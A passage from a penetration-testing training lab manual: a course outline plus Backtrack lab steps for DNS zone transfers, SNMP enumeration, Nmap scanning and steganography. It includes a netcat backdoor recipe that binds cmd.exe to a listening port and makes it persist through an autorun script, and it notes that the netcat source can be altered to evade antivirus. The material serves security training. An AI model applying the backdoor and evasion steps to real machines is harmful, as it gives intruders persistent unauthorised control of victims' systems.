St. Angelo‘s Professional Education Lab Manual v1.0
1
Contributing Authors:
Rajesh Vishwakarma
Vinod Singh
Satish Jha
Lalit Jha
St. Angelo‘s Professional Education Lab Manual v1.0
2
Table of Contents
Program Overview ............................................................................................................................ 5
What is penetration testing? ........................................................................................................ 5
Objectives ..................................................................................................................................... 5
Pre-requisites ............................................................................................................................... 5
Course Contents ........................................................................................................................... 6
Module One: Art of Hacking ..................................................................................................... 6
Module Two: Scenario of Enterprise security .......................................................................... 6
Module Three: Planning and gathering Information................................................................ 6
Module Four: Social Engineering .............................................................................................. 6
Module Five: Taking on the system .......................................................................................... 7
Module Six: Attacking passwords ............................................................................................. 7
Module Seven: Malwares, Rootkits and Trojans ...................................................................... 7
Module Eight: Getting Offensive .............................................................................................. 8
Module Nine: Exploiting ........................................................................................................... 8
Module Ten: Report writing & Supporting compliance ........................................................... 9
NSD Penetration Testing Training Schedule ...................................... Error! Bookmark not defined.
Day 1 Schedule .............................................................................. Error! Bookmark not defined.
Day 2 Schedule .............................................................................. Error! Bookmark not defined.
Day 3 Schedule .............................................................................. Error! Bookmark not defined.
Day 4 Schedule .............................................................................. Error! Bookmark not defined.
Day 5 Schedule .............................................................................. Error! Bookmark not defined.
Group Discussions ...................................................................................................................... 10
Team Activities ........................................................................................................................... 10
Case studies ................................................................................................................................ 10
Assignments ............................................................................................................................... 11
Module One: Art of Hacking ........................................................................................................... 12
Group Discussion - Hacker Culture, Ethics and Rise of Anonymous .......................................... 12
Hacker Culture - Discuss the following questions: ................................................................. 12
Ethics - Discuss the following questions: ................................................................................ 12
Rise of Anonymous ................................................................................................................. 13
Group Discussion: What is a System? .................................................................................... 13
Scenario: ................................................................................................................................. 13
Assignment ............................................................................................................................. 13
Module Two: Scenario of Enterprise Security ................................................................................ 14
Scenario ...................................................................................................................................... 14
Challenges .................................................................................................................................. 14
Group Discussions: ..................................................................................................................... 15
St. Angelo‘s Professional Education Lab Manual v1.0
3
Module Three: Planning and Gathering Information ..................................................................... 16
Getting Started With Backtrack: ................................................................................................. 16
Logging into backtrack: ........................................................................................................... 16
Changing default password .................................................................................................... 16
Starting the Graphical User Interface ..................................................................................... 16
Network configuration: .......................................................................................................... 16
Starting various services in Backtrack .................................................................................... 17
Navigating the System ............................................................................................................ 18
Pentest Directory .................................................................................................................... 21
Netcat overview ..................................................................................................................... 21
To Use netcat as a backdoor: ................................................................................................. 22
Exercises: ................................................................................................................................ 22
Foot-printing:.............................................................................................................................. 22
What is DNS: ........................................................................................................................... 23
Zone Transfer: ........................................................................................................................ 23
Dnsenum.pl ............................................................................................................................ 24
Using Dig ................................................................................................................................. 24
Using Whois ............................................................................................................................ 25
Exercises: ................................................................................................................................ 26
Using Maltego: ....................................................................................................................... 26
Scanning: .................................................................................................................................... 28
Tools – IP scanning: ................................................................................................................ 29
Nmap: ..................................................................................................................................... 29
Enumeration: .............................................................................................................................. 30
SNMP Enumeration: ............................................................................................................... 31
Steganography: Hiding Data within Data ....................................................................................... 33
Exercises ................................................................................................................................. 39
Module Four: Social Engineering .................................................................................................... 40
Social Engineering Concepts: ...................................................................................................... 40
Dumpster Diving ......................................................................................................................... 41
Module Five: Taking on the system ................................................................................................ 42
NTFS Alternate Streams: ........................................................................................................ 42
Physical Access Attacks: ......................................................................................................... 43
Reset Linux Passwords: .......................................................................................................... 43
Reset Windows Passwords: .................................................................................................... 44
Using chntpw .......................................................................................................................... 44
TCPDUMP (Network Analyzers) .............................................................................................. 46
Wireshark .............................................................................................................................. 49
St. Angelo‘s Professional Education Lab Manual v1.0
4
Arp Spoofing (Ettercap) ....................................................................................................... 52
Module Six: Attacking passwords .............................................................................................. 55
HYDRA: Brute Force tool ..................................................................................................... 55
Using Lophtcarck to crack the hashes: .............................................................................. 56
Module Seven: Malwares, Rootkits and Trojans ...................................................................... 58
Objectives: ............................................................................................................................. 58
Beast....................................................................................................................................... 59
Trojan ..................................................................................................................................... 59
Building a Trojan using Beast ............................................................................................. 59
Batch File Viruses.................................................................................................................. 67
theHarvester.py .............................................................................................................................. 70
Exercises ................................................................................................................................. 72
Module Eight: Getting Offensive ................................................................................................ 73
Common Web Application Attacks ....................................................................................... 73
Objective ............................................................................................................................... 73
Tools....................................................................................................................................... 73
Netcraft .................................................................................................................................. 73
Configuring WebGoat ......................................................................................................... 74
SQL Injection ......................................................................................................................... 75
Using Tamperdata ................................................................................................................ 76
Havij ....................................................................................................................................... 79
Cross Site Scripting .............................................................................................................. 82
Basic Authentication Flaws .................................................................................................. 84
Google Dorks ........................................................................................................................ 87
Module Nine: Exploiting .............................................................................................................. 88
Buffer Overflows: .................................................................................................................. 88
Using Ollydbg ....................................................................................................................... 91
Writing Shellcode: ................................................................................................................ 98
Metasploit: .......................................................................................................................... 101
Exercises:.............................................................................................................................. 105
Proxies and Tunneling Techniques ............................................................................................... 107
Proxies ...................................................................................................................................... 107
Pivoting (SSH tunneling) ....................................................................................................... 110
Exercises: .............................................................................................................................. 110
St. Angelo‘s Professional Education Lab Manual v1.0
5
Program Overview
What is penetration testing?
A penetration test, occasionally pentest, is a method of evaluating the security of a computer system
or network by simulating an attack from malicious outsiders (who do not have an authorized means of
accessing the organization‘s systems) and malicious insiders (who have some level of authorized
access).
The process involves an active analysis of the system for any potential vulnerabilities that could result
from poor or improper system configuration, both known and unknown hardware or software flaws,
and operational weaknesses in process or technical countermeasures. This analysis is carried out from
the position of a potential attacker and can involve active exploitation of security vulnerabilities.
Security issues uncovered through the penetration test are presented to the system‘s owner. Effective
penetration tests will couple this information with an accurate assessment of the potential impacts to
the organization and outline a range of technical and procedural countermeasures to reduce risks.
Objectives
At the end of the training, following objectives will be achieved:
Design and create attack plan methodologies
Understand social engineering aspects used for attacks
Get an insight into enterprise security trend
Use latest techniques to hack into systems and networks
Conduct regular audits and penetration test in your company
Support legal team with Digital forensic evidence
Support compliance roadmaps based on standards for your organization
Support Internal Audit teams for IT security compliance
Pre-requisites
Background in A+ or MCSE recommended
Good documentation and presentation skills
A strong attitude and proactive approach for self-learning
St. Angelo‘s Professional Education Lab Manual v1.0
6
Course Contents
Module One: Art of Hacking
History of hacking
Group Discussion: Hacker Culture, Ethics and Rise of Anonymous
The need of hacking
Group Discussion: What is a system?
Assignment: What is People, Process and Technology and how does it impact security?
Knowing your enemy
Module Two: Scenario of Enterprise security
Team Activity: Is IT security a cost center?
Technology Vs Management
Case study: Security budget across different verticals
Team Activity: Requesting new server in DC
Case study: Insider trading
Making the enterprise: Business Applications
Group Discussion: Why is it always possible to hack?
Module Three: Planning and gathering Information
Making the Plan
Information gathering approaches
Basics: Using BackTrack
Footprinting
Scanning
Enumeration
Group Discussion: What is your approach to gather information?
Team Activity: Gathering information about an organization
Identifying weakness
Module Four: Social Engineering
Introduction to Social Engineering
Assignment: Watch movies on “hacking”
Why people are the weakest link in security
Assignment: What is Body language?
Using Social Networking for effectively gaining trust
Scripting in daily life
St. Angelo‘s Professional Education Lab Manual v1.0
7
Assignment: Read the book “Games people play”
Introduction to Reality Hacking
Group Discussion: Do you believe in Astrology?
Case study: Using Black magic and Occult science to hack!
Assignment: Influence a friend to wear specific clothes on a day by exploiting his/her belief
Team Activity: Using social engineering in daily life
Module Five: Taking on the system
Group Discussion: Windows vs Linux vs Mac
Introduction to systems
Assignment: Active Directory Fundamentals
Hiding Data – NTFS streaming
Gaining root access
Privilege Escalation
Man in the Middle attacks
Finding Vulnerabilities
Module Six: Attacking passwords
Password Hacking
Attacking Windows & Linux Passwords
Attacking application passwords
Group Discussion: Do you use the same passwords everywhere?
Case study: Most common passwords used
Using Brute Force Tools
Steganalysis concepts
Using Rainbow Tables
Team activity: Using online hash crackers
Default Passwords of devices
Case study: Impact of default passwords on security
Using Key loggers for stealing passwords
Team activity: Password recovery tools
Module Seven: Malwares, Rootkits and Trojans
Group Discussion: How would you define a malware?
Introduction to malwares
Team activity: List the features will you look in a malware if you have to use it
Building a Trojan
St. Angelo‘s Professional Education Lab Manual v1.0
8
Binding a Trojan to another file
Approaches for deploying a Trojan
Case study: Targeting Victims by fake games and movies
Target Harvesting
Rootkits and Botnets
Case study:How botnets work?
Team activity: Find most popular malwares impacting the mobile platforms.
Module Eight: Getting Offensive
Using data from Information gathering activity for attacks
Attacking web applications
Team Activity: Setting up WordPress on localhost
Group discussion: what mistakes can affect web application security?
Web server Security
Top 10 threats to Web Applications
Basic Authentication Attacks
SQL Injection & Cross site scripting
LFI / RFI
Advanced Google search techniques
Group discussion: DoS attacks impacting organizations
Sniffing networks
Module Nine: Exploiting
Memory concepts and File Format for executables
Quick Assembly introduction
Stack over flows from scratch
Introduction to Debuggers like IDA/Ollydbg
Introduction to Shellcodes
Introduction to Exploit Writing
Using exploit-db effectively
Creating a sample exploit
Metasploit – The Big Daddy
Introduction to msfencode/msfpayload
Manual Shellcode Writing and Automatic Shellcode Generation
Introduction to Fuzzing and Fuzzing framework
Client Side Exploitation Techniques
Concept of tunneling and techniques
St. Angelo‘s Professional Education Lab Manual v1.0
9
Evading Firewalls by hopping through the tunnels using proxy servers
smb fun – windows and linux
The art of exploit writing ( Windows and Linux)
Different type of exploits including off by one , race conditions
Anti Virus Evasion
Setting up a lab
Module Ten: Report writing & Supporting compliance
Building professional reports – basics
Team activity: Create a VA report
Introduction to ISO 27001
Discussion: Security as a continuous process
Introduction to SIEM technologies
Group Discussion: Impact of Log Analysis & co-relation
Importance of Audits
Team Activity: Communicating with management
Team Activity: Forming a steering committee
Group discussion: What will you expect from VA reports as a CISO?
Group discussion: Importance of training
Group discussion: Patch Management
Assignment: What is Asset management?
Best practices & Case study
St. Angelo‘s Professional Education Lab Manual v1.0
10
Group Discussions
Group Discussions
01 Hacker Culture, Ethics and Rise of Anonymous
02 What is a system?
03 Why is it always possible to hack?
04 What is your approach to gather information?
05 Do you believe in Astrology?
06 Windows vs Linux vs Mac
07 Do you use the same passwords everywhere?
08 How would you define a malware?
09 What mistakes can affect web application security?
10 DoS attacks impacting organizations
11 Security as a continuous process
12 Impact of Log Analysis & co-relation
13 What will you expect from VA reports as a CISO?
14 Importance of training
15 Patch Management
Team Activities
Team Activities
01 Is IT security a cost center?
02 Requesting new server in DC
03 Gathering information about an organization
04 Using social engineering in daily life
05 Using online hash crackers
06 Password recovery tools
07 List the features will you look in a malware if you have to use it
08 Find most popular malwares impacting the mobile platforms.
09 Setting up WordPress on localhost
10 Create a VA report
11 Communicating with management
12 Forming a steering committee
Case studies
Case Studies
01 Security budget across different verticals
St. Angelo‘s Professional Education Lab Manual v1.0
11
02 Insider trading
03 Using Black magic and Occult science to hack!
04 Most common passwords used
05 Impact of default passwords on security
06 Targeting Victims by fake games and movies
07 How botnets work?
Assignments
Assignments
01 What is People, Process and Technology and how does it impact security?
02 Watch movies on ―hacking‖
03 What is Body language?
04 Read the book ―Games people play‖
05 Influence a friend to wear specific clothes on a day by exploiting his/her belief
06 Active Directory Fundamentals
07 What is Asset management?
St. Angelo‘s Professional Education Lab Manual v1.0
12
Module One: Art of Hacking
Module One: Art of Hacking
India is known for its capability in Information Technology. But, it is also a fact that India is one of the
top countries with highest rate of Cybercrimeincidents and Computer Virus infections. This not only
affects a lot of individuals, but also the business and the Government, who are regular targets of
coordinated hacking attacks.
But what is the History of Hacking? How did it all start?
Your Instructor will walk you through the amazing history!
Meanwhile, visit these links!
http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history
http://freehacking.org/hackerhistory/
Group Discussion - Hacker Culture, Ethics and Rise of Anonymous
Hacker Culture - Discuss the following questions:
1. What do you think is Hacker Culture? Who defines it?
2. What is the description of a hacker?
3. What kind of perception do general people have on Hackers?
4. What do you think are the trends in hacker culture over the last 5 years?
5. List down at least 5 significant aspects that you feel define the cult and culture of hackers.
6. Discuss about Aaron Swartz - what do you think about the case and fairness of law related to
hacking?
7. Submit a one page write-up (300 words or more) on your view of Aaron Swartz case, hacker
culture and its importance to your Instructor.
Ethics - Discuss the following questions:
1. What are ethics? Do you feel Hackers have ethics as part of their hacker culture?
2. How are ethics different from code of conduct?
3. How do ethics play in a role in defining a White Hat, Black Hat or Grey Hat Hacker?
4. What do you think is the most important ethic that needs to be followed by Hackers?
5. If you find a vulnerability in a company website while surfing the Internet, what action will you
take and how will your action be ethical?
6. What do you think of Wikileaks? How ethical do you think is the concept of Wikileaks and
what are its impact?
7. Submit a one page write-up (300 words or more) on your view of Wikileaks and Computer
Ethics to your Instructor.
St. Angelo‘s Professional Education Lab Manual v1.0
13
Rise of Anonymous
1. What do you think is Anonymous all about?
2. Do you think the actions of Anonymous is ethical?
3. What do you think is the impact of Anonymous on freedom of Internet?
4. What are the legal risks of starting such groups and getting caught?
5. Does the society derive any benefit or is there a larger good from actions of such groups?
6. Submit a one page write-up (300 words or more) on role of Hacker groups, Hactivism and its
potential impact on Internet.
Group Discussion: What is a System?
1. What are the components of a system? List down the components you can think of and give it
to your Instructor.
2. What is the definition of a system? Is it a computer? A mouse? A CPU? A process?
3. What are networks? What makes up a network?
4. List some devices required to create a network and try explaining their generic working.
5. What is a Client / Server Model?
6. What are web applications? what are the components of the a web application?
7. When you open a web-page, what all actions happen behind the scenes to deliver the content
to you?
Scenario:
You need to send a letter across one building to another, but the road is filled with Terrorists..they will
shoot you if you step outside.. what kind of approach will you take to deliver this and why?
Assignment
What is People, Process and Technology and how does it impact security?
Submit your assignment in a word document in approximate 300 words or more to your Instructor.
St. Angelo‘s Professional Education Lab Manual v1.0
14
Module Two: Scenario of Enterprise security
Module Two: Scenario of Enterprise Security
In this activity, you are going to try and understand real life challenges in running organizations vs
priority of security.
Scenario
Background - First Company
You are working for ACME SOFT - a start-up software development with a budget of INR Ten Lacs for
one year. The company has 7 employees as follows:
Employee 1: Founder / Managing Director – responsible for finances
Employee 2: Project Manager / Developer – responsible for project completion
Employee 3: IT Manager – responsible for IT infra and Security
Employee 4,5,6,7 - Developers
ACME SOFT has developed a software product that costs Rs.25000 per licensing. The company is
planning to hire more employees for expanding their operations and developing new product that will
take 6 months to create.
Background - Second Company
You are working for ACME SECURE - a start-up security consulting company with a capital of INR Ten
Lacs. The company has 6 employees as follows:
Employee 1: Founder / Managing Director – responsible for finances
Employee 2: Project Manager / Pre-sales Manager – responsible for Sales & business
Employee 3: Security Engineer – responsible to support after sales, deploy product etc
Employee 4,5,6 - Junior Staff
ACME SECURE have developed a security product that costs Rs.9000 to make for each software
license. It can make software more secure from hacking and is very useful for software development
companies.
Challenges
Task One: The Group leader from each company must allocate budget for:
Salary for employees
Budget for IT Infrastructure
St. Angelo‘s Professional Education Lab Manual v1.0
15
Budget for Marketing
Budget for running company / taxes
Task Two: ACME SECURE has to give a demonstration to ACME SOFT about their product and sell it.
Group Discussions:
1. How will ACME SECURE sell this product? What are the challenges?
2. Who needs to be convinced in ACME SOFT to buy the product?
3. How will ACME SOFT manage and plan the budget for new employees for 6 months with a
given capital? Will this be impacted if they plan to buy the security product from ACME
SECURE?
4. Why will ACME SOFT require the security product?
5. What are the risks of ACME SOFT not buying the security product?
6. What are the financial risks if ACME SOFT buys the security product? Is it a priority?
7. How will ACME SECURE sustain itself if ACME SOFT does not buy it?
8. Do you think ACME SOFT IT Manager can do his job properly if he does not get the required
hardware and software for security of the company products and data?
9. Do you think ACME SOFT MD will care about security if he does not make enough revenue to
run the company and pay employees on time?
10. Do you think security is a cost center? Why?
St. Angelo‘s Professional Education Lab Manual v1.0
16
Module Three: Planning and gathering Information
Module Three: Planning and Gathering Information
Getting Started With Backtrack:
Objectives: At the end of this module you should be able
To work with backtrack Linux OS.
To use various Linux commands.
To be able to locate tools, software and scripts used in penetration testing.
Logging into backtrack:
Once you boot into backtrack, you can login with the below information:
The default user name is: root
The default password is: toor
Changing default password
You can change the password using the command:
root@bt:~# passwd
Starting the Graphical User Interface
In order to get into a GUI interface you‘ll have to execute the following command:
root@bt:~# startx
Network configuration:
Setting up IP manually: We can set IP address using the GUI interface but it‘sbetter once you are
familiar with the command line.
First off check for available Ethernet devices, for that execute the command
St. Angelo‘s Professional Education Lab Manual v1.0
17
root@bt:~# ifconfig
In order to make the following changes:
IP Address - 192.168.1.11
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
We will have to execute the following commands (Where eth0 is the network interface name)
Step 1:
root@bt:~# ifconfig eth0 192.168.1.11
Step 2:
root@bt:~# route add default gw 192.168.1.1
Step 3:
root@bt:~# echo nameserver 192.168.1.1 >
/etc/resolv.conf
In order to enable the device the following command:
root@bt:~# ifup eth0
root@bt:~# ifup eth0 (to disable)
Starting various services in Backtrack
Backtrack has various services such as Apache, SSH, MySQL, VNC, etc.
To start a service such as SSH, you can use the service init scripts.
St. Angelo‘s Professional Education Lab Manual v1.0
18
Starting SSH:
Step 1: Generating SSH key
root@bt:~# sshd-generate
Step 2: Starting SSH service
root@bt:~# /etc/init.d/ssh start
To stop service
root@bt:~# /etc/init.d/ssh stop
Apache:
Starting Apache
root@bt:~# /etc/init.d/apache2 start
Stopping Apache
root@bt:~# /etc/init.d/apache2 stop
Navigating the System
When you first login, your current working directory is your home directory.
To find out what is in your home directory, type
root@bt:~# ls
St. Angelo‘s Professional Education Lab Manual v1.0
19
The ls command (lowercase L and lowercase S) lists the contents of your current working directory.
CD command: used to change the working directory , to change the working directory type.
root@bt:~# cd
mkdir (make directory )
The command is used to make a new directory, to make a new directory type:
root@bt:~# mkdir (directory name)
cp (copy)
The command is used to copy files, syntax is:
St. Angelo‘s Professional Education Lab Manual v1.0
20
root@bt:~# cp SOURCE DEST
cat (concat)
The cat is one of the most frequently usedcommands . It has three related functions with regard to
text files: displaying them, combining copies of them and creating new ones.
locate
The locate command is often the simplest and quickest way to find the locations of files and
directories.
The basic syntax for locate is:
locate [options] name(s)
Example of the command:
St. Angelo‘s Professional Education Lab Manual v1.0
21
Pentest Directory
Most of the tools are located either in the path or in the /pentest directory. The toolsin the /pentest
directory are categorized and subcategorized as different attack vectors andtools.
Some of the important directories are
./backdoors :This folder contains various backdoor‘s which can be used to maintain accessin a
target system.
./exploits :This folder contains various exploits for windows, Linux etc.written in various languages
like Perl, pythonetc., which can be used to hack into a system.
./passwords :This folder contains password cracking tools
Netcat overview
Netcat also called ―The swiss army knife‖ is a utility used to write data across TCP and UDP networks.
Using netcat an attacker can place backdoor that will allow him/her to telnet DOS shell.
St. Angelo‘s Professional Education Lab Manual v1.0
22
In fact netcat can be used as port scanner, banner grabbing tool, Trojan and backdoor. The power of
netcat can be calculated from the fact that it can act as both server and client and even doesn't get
detected by Anti-Virus and even if it gets detected its source code is available add some unnecessary
code that will change its signature thus allowing it by bypass Anti-Virus. This tutorial is aimed at
complete beginner to netcat.
We can also use netcat as banner grabbing tool that means it can grab application version.
C:\>nc -v -n 10.42.43.12 80
v - tells keep output in verbose mode
n - do not resolve DNS, keep all addresses numerical
To Use netcat as a backdoor:
First, get the netcat executable file (nc.exe) onto the target's c:\windows\system32 directory. Then
make a batch file with the following command in it:
nc -L -d -p <port No> -t -e cmd.exe
Tip: One trick is to make this batch file be aautorun/startup script, thus whenever the system starts
the script will run automatically.There are lots of other tricks that can be used. Just find your way.Once
that batch file is run, you can telnet or use netcat in client mode to connect to it.
Here's how to use netcat to connect to it:
In a command prompt, give the command
C:\WINDOWS\>nc -v <IP Address ><port No>
Once you connected to that port on the victim‘s computer, you'll have a Command prompt that you
can give any command on the victim‘s computer.
Exercises:
Use the locate command to locate ―theHarvester” tool
Use the ‗find‘ command to find the ―.lst” files in backtrack.
Name at least five tools in each directories of pentest.
Create a text file using cat and use cat to display it on screen.
Foot-printing:
Objectives: At the end of this module you should be able
St. Angelo‘s Professional Education Lab Manual v1.0
23
To learn techniques used to gather information on a target computer system.
To effectively use DNS and Network information gathering tools.
To gather public information from various search engines and websites.
To profile a target organization/network effectively.
What is DNS:
The domain name system (DNS) is the way that Internet domain names are located and translated into
Internet Protocol addresses. A domain name is a meaningful and easy-to-remember "handle" for an
Internet address.
DNS servers do hold a lot of information about a domain‘s IP addresses which are essential in
attacking a system. Having the knowledge about all the IP addresses of a particular domain increases
the success rate of an attack.
Zone Transfer:
A Zone Transfer is the term used to refer to the process by which the contents of a DNS Zone file are
copied from a primary DNS server to a secondary DNS server.
A zone transfer takes place
When starting the DNS Service on the secondary DNS server.
When the refresh time expires.
When changes are saved to the Primary Zone file and there is a Notify List.
A zone transfer should take place from a primary DNS server to Secondary DNS server where the
secondary DNS server is a registered DNS server.
But in certain cases where the primary DNS server fails to check the authenticity of the secondary
server, it can transfer the zone to any system that requests for a zone transfer.
A zone transfer can be performed by any of the following tools. There are also automated scripts in
our backtrack OS which extend and ease out the process of performing a zone transfer.
o Dig
o Host
o Dnsenum.pl <Backtrack Tool>
o Fierce.pl <Backtrack Tool>
The following snippet shows how a zone is transferred from primary to secondary DNS server
St. Angelo‘s Professional Education Lab Manual v1.0
24
Dnsenum.pl
This tool automatically finds out information about DNS, including name servers, mail servers and
zone transfers.
The tool is located at /pentest/enumeration/dns/dnsenum/
#dnsenum<domain>
Using Dig
Domain Information Groper (dig) is a network administration command-line tool for querying Domain
Name System (DNS) name servers for any desired DNS records.
Dig is useful for network troubleshooting and for educational purposes. Dig can operate in interactive
command line mode or in batch mode by reading requests from an operating system file.
When a specific name server is not specified in the command invocation, it will use the operating
systems default resolver, usually configured via the <resolv.conf> file. Without any arguments it
queries the DNS root zone.
#: dig<example.com>
Example of Dig command
St. Angelo‘s Professional Education Lab Manual v1.0
25
To perform a zone transfer use the following command
#dig www.example.com <nameserver> AXFR
Host: <example> : host <example.com>
Host command returns the Internet address of a host machine when the <HostName> parameter is
specified and the name of the host when the Address parameter is specified.
Depending on the configuration of name resolution service, the host command may also display any
aliases associated with the <HostName> parameter.
Host command can also be used to perform a zone transfer by using ―-l‖ as an option
Host -l <domain name><nameserver>
Using Whois
Whois is a query and response protocol that is widely used for querying databases that store the
registered users or assignees of an Internet resource, such as a domain name, an IP address block, or
an autonomous system, but is also used for a wider range of other information. The protocol stores
and delivers database content in a human-readable format.
The following image shows the details poured out by whois command.
WHOIS: <example>: whois<example.com>
St. Angelo‘s Professional Education Lab Manual v1.0
26
Apart from having these tools we can use other online tools available from the following sites
http://remote.12dt.com/
www.yougetsignal.com
www.domainresearchtool.com
www.netcraft.com
www.domaintools.com
www.who.is
www.hackersforcharity.org
http://www.exploit-db.com/google-dorks/
Exercises:
Use the following tools and explain the functioning with an example:
○ Ping
○ Traceroute
○ NSLookup
○ Netcraft
Using Maltego:
St. Angelo‘s Professional Education Lab Manual v1.0
27
Maltego is an information gathering tool that allows you to visually see relationships. Maltego allows
you to enumerate network and domain information like:
Domain Names
Whois Information
DNS Names
Netblocks
IP Addresses
Maltego also allows you to enumerate People information like:
Email addresses associated with a person's name
Web sites associated with a person's name
Phone numbers associated with a person's name
Social groups associated with a person's name
Companies and organizations associated with a person's name
Maltego also allows you to:
Do simple verification of email addresses
Search blogs for tags and phrases Identify incoming links for websites
Extract metadata from files from target domains
Maltego can be used for the information gathering phase of all security related work. It will save you
time and will allow you to work more accurately and smarter. Maltego aids you in your thinking
process by visually demonstrating interconnected links between searched items.
Maltego provide you with a much more powerful search, giving you smarter results. If access to
"hidden" information determines your success, Maltego can help you discover it.
Maltego supports 4 types of layout algorithms:
Block layout. This is the default layout and is also used during mining. This layout is
discussed in more depth later.
Hierarchical layout. Think of this a tree based layout â€― like a file manager.
Centrality layout. Nodes that are most central to the graph (e.g. most incoming links) appear
in the middle with the other nodes scattered around it.
Organic layout. Nodes are packed tight together in such a way that the distance between
each node and all the other nodes are minimized.
We can start by taking a name, and use Maltego to enumerate possible email addresses. The first
thing we have to do is input our search terms. First Name: XYZ, Surname: ZYX. You can also use
additional search terms like Country Code and Additional Search Term.
St. Angelo‘s Professional Education Lab Manual v1.0
28
The result is neat graph showing us the relationship of the entity to other different entities and their
information.
Exercises:
Students are recommended to work on Maltego from your Backtrack OS and perform
transformations on atleast three different entities.
Document every finding on each entity performed.
Warning:Students should not go for all transformations at once as it consumes a lot of bandwidth.
You should not create any trouble to the owner of the entity!
Scanning:
Port scanning is one of the most common reconnaissance techniques used by testers to discover the
vulnerabilities in the services listening at well-known ports.
St. Angelo‘s Professional Education Lab Manual v1.0
29
Once you've identified the IP address of a target system through footprinting, you can begin the
process of port scanning: looking for holes in the system through which you -- or a malicious intruder
-- can gain access.
A typical system has 2^16 -1 port numbers, each with its own TCP and UDP port that can be used to
gain access if unprotected.
Three phases are included in scanning
1. IP scanning.
2. Port scanning.
3. Vulnerability scanning.
IP scanning: Scanning for live systems
Examples:
○ Angry IP scanner
○ Unicornscan
○ Advanced IP scanner
Port scanning: Scanning the systems for open ports
Examples:
○ Nmap
○ Autoscan
○ Netifera
Vulnerability scanning: Scanning the system for any vulnerability in the services.
Examples:
○ Nessus
○ Core Impact
○ Acunetix
Tools – IP scanning:
Angry Ip Scanner:
Nmap:
The best in the market for Port scanning, Nmap gives us Information about the services running on a
specific port, operating system details, NetBIOS Information, Shared Folders and lots more.
St. Angelo‘s Professional Education Lab Manual v1.0
30
Steps to use the program:
Open Zenmap (Graphical User Interface for Nmap).
Provide the Target IP or Range.
Select the Profile to scan.
Click on Scan to start the scan.
You can also provide any extra options to the current scan in the Command Box.
Results can be viewed in the Nmap Output Pane.
Nmap - Interesting options
● -f fragments packets
● D Launches decoy scans for concealment
● -I IDENT Scan – finds owners of processes (on Unix systems)
● -b FTP Bounce
Port Scan Types
● TCP Connect scan
● TCP SYN scan
● TCP FIN scan
● TCP Xmas Tree scan (FIN, URG, and PUSH)
● TCP Null scan
● TCP ACK scan
● UDP scan
Enumeration:
Objectives: At the end of this module you should be able to
St. Angelo‘s Professional Education Lab Manual v1.0
31
Enumerate systems on the network.
Effectively use SNMP protocol to gather information of systems and network.
Description:
Enumeration is making an ordered list of items, here we try to enumerate devices/nodes in a network,
which makes the latter penetration part easier.
SNMP Enumeration:
SNMP is based on UDP, a stateless protocol, and is therefore susceptible to IP spoofing. In addition,
SNMP has a weak authentication system for both private and public community strings. These
community strings are passed unencrypted on the network and are often left in their default state -
―private‖ and ―public.‖
Examining information from a Windows host running SNMP can be done by using the following
command:
snmpwalk -c public -v1 <ip address> 1
To view the system info we can use the following arguments to snmpwalk
root@bt:~# snmpwalk -c public -v1 192.168.0.110
SNMPv2-MIB::sysDescr.0
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 4 Stepping 8
AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor
Free)
Enumerating Windows Users:
BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4
"Guest"
"Administrator"
"IUSR_WIN2KSP4"
"IWAM_WIN2KSP4"
"TsInternetUser"
"NetShowServices"
Enumerating Windows Services:
St. Angelo‘s Professional Education Lab Manual v1.0
32
BT-ARKZ # snmpwalk -c public -v1 192.168.0.110
|grephrSWRunName|cut -d " " -f4
"System‖
"System"
"smss.exe"
"csrss.exe"
"snmp.exe"
Enumerating TCP ports:
BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1
|greptcpConnState |cut -d"." -f6 |sort –nu
21
25
80
Having seen some examples above there are lots of other interesting arguments or commands that
can be given to snmpwalk to enumerate many more things. But when we have backtrack we need
worry about remembering all that stuff.
You can use snmpenum.pl and snmpcheck.pl to enumerate all available info.
St. Angelo‘s Professional Education Lab Manual v1.0
33
Steganography: Hiding Data within Data
Objectives: At the end of this module you should be able
Understand Steganography to hide data under images. Comfortably use tools like Image Hide, Invisible Secrets etc.
Description:
Steganography is the technique of writing hidden information within images, audio or video. The wordsteganography is of Greek origin and means "concealed writing". These technique is used by hackers, terrorists etc. to communicate with each other without beingcaught. And the technique makes sure that the data is well hidden. There are many techniques used, but the most famous or commonly used technique is hiding data in aimage file. We will be seeing how it actually done.
We will be using software known as Invisible Secret 2.1
PART 1 (HIDING DATA)
Step 1: Install the software and run it
Step 2: Click on next.
Step 3:
St. Angelo‘s Professional Education Lab Manual v1.0
34
Select the option as shown above and click on next
Step 4:
Select the image in which you want to hide data, Above I have selected a image original.jpg. Then click on next.
Step 5:
St. Angelo‘s Professional Education Lab Manual v1.0
35
Click on add files and here select the file which you want to hide in the picture, As you can see above I have selected a text file “This is secret.txt”. You can select multiple files also. After selecting, click next.
Step 6:
You will have to provide a encryption password, then click next.
St. Angelo‘s Professional Education Lab Manual v1.0
36
Step 7:
Now give the target file a name, this file will contain your hidden text. As you can see above I have named it “stenoimage”. Now click on next
Step 8:
As you can see a new image file has been created with the name “stenoimage”. Its same as the original file with no changes or is it?
Click on next and then on the next window click finish.
St. Angelo‘s Professional Education Lab Manual v1.0
37
Till here we have managed to hide a text file in image. Now on the next part we will extract the hidden data.
EXTRACTING HIDDEN DATA FROM THE IMAGE
Step 1:
Well after clicking on finish you will end up on this screen.
This time select the 2nd option to extract the secret data from the image. Click on next.
St. Angelo‘s Professional Education Lab Manual v1.0
38
Step 2:
Select the image from which you want to extract the hidden file in our case it is “stenoimage.jpg”, then click on next.
Step 4: Input the password that you provided earlier.
As you can see above that’s our secret file, now chose the location where u want to extract it and click on next. And your secret file will be visible.
St. Angelo‘s Professional Education Lab Manual v1.0
39
Exercises
i. Try to extract text from a picture without using steganography tools.
St. Angelo‘s Professional Education Lab Manual v1.0
40
Module Four: Social Engineering
Module Four: Social Engineering
Social Engineering is generally a hacker‘s clever manipulation of the natural human tendency to trust
Objectives:
• Social engineering concepts
• Categories of social engineering
• Techniques for social engineering
• Approach
• Scenarios
• Best practices
• Summary
Social Engineering Concepts:
Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on
human interaction, tricking people to break normal security procedures.Social engineering is generally
